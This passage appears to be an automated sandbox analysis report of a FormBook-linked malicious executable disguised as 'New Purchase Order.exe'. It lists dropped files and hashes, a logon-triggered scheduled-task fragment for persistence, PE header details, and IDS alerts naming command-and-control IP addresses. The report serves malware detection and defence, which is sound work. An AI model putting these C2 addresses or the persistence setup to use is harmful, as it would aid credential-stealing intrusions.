PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hbaiQWstL.exe.log

              Download File
              Process:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5:1330C80CAAC9A0FB172F202485E9B1E8
              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):2232
              Entropy (8bit):5.380805901110357
              Encrypted:false
              SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:lGLHxvCsIfA2KRHmOugo1s
              MD5:5F0D346111304642BD6E3112D4031BA6
              SHA1:0141E3AAE28617B7F350C1FAA1DDA3F030724A95
              SHA-256:B8FC7BFEDD729A8BF385F9BF90A47B5F60C03CDA9FD02DE219362EB373292EBD
              SHA-512:8041A71256BCFA84E950D5E1C36419A75939AE350997712DB037F880411EB0763C49FD72A78A74759AFE4A310BB0F2B2E030D84391F3134C4029D435161A3E5F
              Malicious:false
              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

              C:\Users\user\AppData\Local\Temp\3h8t0-08

              Download File
              Process:C:\Windows\SysWOW64\setupugc.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
              Category:dropped
              Size (bytes):196608
              Entropy (8bit):1.1239949490932863
              Encrypted:false
              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
              MD5:271D5F995996735B01672CF227C81C17
              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
              Malicious:false
              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01ppk1u5.1pa.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mq2m2te.2ye.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fydymcy3.vpy.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvuule0x.uqn.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qavaylnq.kw0.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdkul53d.cxf.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udus2axz.xhm.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z132hflu.xg4.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp

              Download File
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1596
              Entropy (8bit):5.092926961640879
              Encrypted:false
              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLHxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTFv
              MD5:EEABCDA39BEA20CB5CB38B5730387CA3
              SHA1:B355DA24FE85166FD260C6A3A7F544D1D3FFFCCA
              SHA-256:C4FF35F9E6C0D013569A74C7EDF551815EE52950F86C973E765D7A27A5FF199E
              SHA-512:22FE4F5CF72AFFE152780B62E5EF0C00C5AC3F623F77040AA648E6DC2A257C17114588FFE89D3DD201188FFAF26D4EFF251505944D52F932E1CD3FA0D15B1253
              Malicious:true
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

              C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp

              Download File
              Process:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1596
              Entropy (8bit):5.092926961640879
              Encrypted:false
              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLHxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTFv
              MD5:EEABCDA39BEA20CB5CB38B5730387CA3
              SHA1:B355DA24FE85166FD260C6A3A7F544D1D3FFFCCA
              SHA-256:C4FF35F9E6C0D013569A74C7EDF551815EE52950F86C973E765D7A27A5FF199E
              SHA-512:22FE4F5CF72AFFE152780B62E5EF0C00C5AC3F623F77040AA648E6DC2A257C17114588FFE89D3DD201188FFAF26D4EFF251505944D52F932E1CD3FA0D15B1253
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

              C:\Users\user\AppData\Roaming\hbaiQWstL.exe

              Download File
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):733696
              Entropy (8bit):7.857574491479369
              Encrypted:false
              SSDEEP:12288:NVYEZ6MDir5xlYeurNrB2bUyH8sETibdXEBYqLy+Z2WY13yxMWZIzM:POr5EeM16zcsAibaj7Yiqtz
              MD5:E392C45451247441D1763095DB3CD57A
              SHA1:F37255D99C5BFF5C1E60209D7AFEE3445E277E6D
              SHA-256:7616904DB54D77CB25CC58F279BFDF6EF5CBABE19573CBD781238BE01DAAA1C4
              SHA-512:DBC0C09885BDA8042402BD09A307541F8DB4AF27ACCAC03268C1E7C08ABD35984AA570AC2900C6369357B42E7F28E39E1DE7795BA33C2813384A4C370635A06E
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 29%
              • Antivirus: Virustotal, Detection: 33%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f..............0.............j0... ...@....@.. ....................................@..................................0..O....@..L....................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc...L....@......................@..@.reloc.......`.......0..............@..B................L0......H........D...a..........p.................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(.....*...0............}......}.....sf...%.oU....%r...poS....%.oW....%r...poO....% ....oQ....%.oY....%r...po[....}......}......}.....(.......(/....*..0............sg...}.....s....}.....

              C:\Users\user\AppData\Roaming\hbaiQWstL.exe:Zone.Identifier

              Download File
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.857574491479369
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:New Purchase Order.exe
              File size:733'696 bytes
              MD5:e392c45451247441d1763095db3cd57a
              SHA1:f37255d99c5bff5c1e60209d7afee3445e277e6d
              SHA256:7616904db54d77cb25cc58f279bfdf6ef5cbabe19573cbd781238be01daaa1c4
              SHA512:dbc0c09885bda8042402bd09a307541f8db4af27accac03268c1e7c08abd35984aa570ac2900c6369357b42e7f28e39e1de7795ba33c2813384a4c370635a06e
              SSDEEP:12288:NVYEZ6MDir5xlYeurNrB2bUyH8sETibdXEBYqLy+Z2WY13yxMWZIzM:POr5EeM16zcsAibaj7Yiqtz
              TLSH:1BF4017123F4DD29C2B90334A431E33999255E9BE239C162FBDE7D97BF2AB015527202
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f..............0.............j0... ...@....@.. ....................................@................................

              File Icon

              Icon Hash:a5b3b38589b08045

              Static PE Info

              General

              Entrypoint:0x4b306a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x66EA2692 [Wed Sep 18 01:02:10 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Entrypoint Preview

              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xb30180x4f.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x1a4c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000xb10700xb1200f3b7e2f56b9e6ab2b96d5ecaaf94a7cdFalse0.9035015658080452data7.866114778015551IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0xb40000x1a4c0x1c009e5d526c522ad987359bee895a05fc6dFalse0.8000837053571429data7.035963466638725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0xb60000xc0x2007f801ca94e9baf1577dc3573932ba129False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xb41000x13f1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9729676787463272
              RT_GROUP_ICON0xb55040x14data1.05
              RT_VERSION0xb55280x324data0.4291044776119403
              RT_MANIFEST0xb585c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

              Imports

              DLLImport
              mscoree.dll_CorExeMain

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-09-18T09:02:38.896122+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64972382.221.128.18380TCP
              2024-09-18T09:03:02.686621+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657951217.160.0.12780TCP
              2024-09-18T09:03:05.348998+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657952217.160.0.12780TCP
              2024-09-18T09:03:07.911277+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657953217.160.0.12780TCP
              2024-09-18T09:03:10.463337+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657954217.160.0.12780TCP
              2024-09-18T09:03:17.180314+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65795785.159.66.9380TCP
              2024-09-18T09:03:19.727259+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65795885.159.66.9380TCP
              2024-09-18T09:03:22.274064+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65795985.159.66.9380TCP
              2024-09-18T09:03:24.018954+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65796085.159.66.9380TCP
              2024-09-18T09:03:30.443957+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65796113.228.81.3980TCP
              2024-09-18T09:03:33.005262+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65796213.228.81.3980TCP
              2024-09-18T09:03:35.518266+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65796313.228.81.3980TCP
              2024-09-18T09:03:38.098354+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65796413.228.81.3980TCP
              2024-09-18T09:03:44.286470+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657965162.0.213.9480TCP
              2024-09-18T09:03:46.872970+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657966162.0.213.9480TCP
              2024-09-18T09:03:49.478868+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657967162.0.213.9480TCP
              2024-09-18T09:03:51.953976+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657969162.0.213.9480TCP
              2024-09-18T09:03:57.763893+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6579703.33.130.19080TCP
              2024-09-18T09:04:00.089121+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6579713.33.130.19080TCP
              2024-09-18T09:04:03.651445+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6579723.33.130.19080TCP
              2024-09-18T09:04:05.882314+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6579733.33.130.19080TCP
              2024-09-18T09:04:11.391462+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65797413.248.169.4880TCP
              2024-09-18T09:04:13.917505+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65797513.248.169.4880TCP
              2024-09-18T09:04:16.464696+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65797613.248.169.4880TCP

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 18, 2024 09:02:38.226147890 CEST4972380192.168.2.682.221.128.183
              Sep 18, 2024 09:02:38.231193066 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.231316090 CEST4972380192.168.2.682.221.128.183
              Sep 18, 2024 09:02:38.238545895 CEST4972380192.168.2.682.221.128.183
              Sep 18, 2024 09:02:38.243834972 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895858049 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895900965 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895914078 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895926952 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895937920 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895950079 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895962954 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895976067 CEST804972382.221.128.183192.168.2.6
              Sep 18, 2024 09:02:38.895987034 CEST804972382.221.128.183192.168.2.6
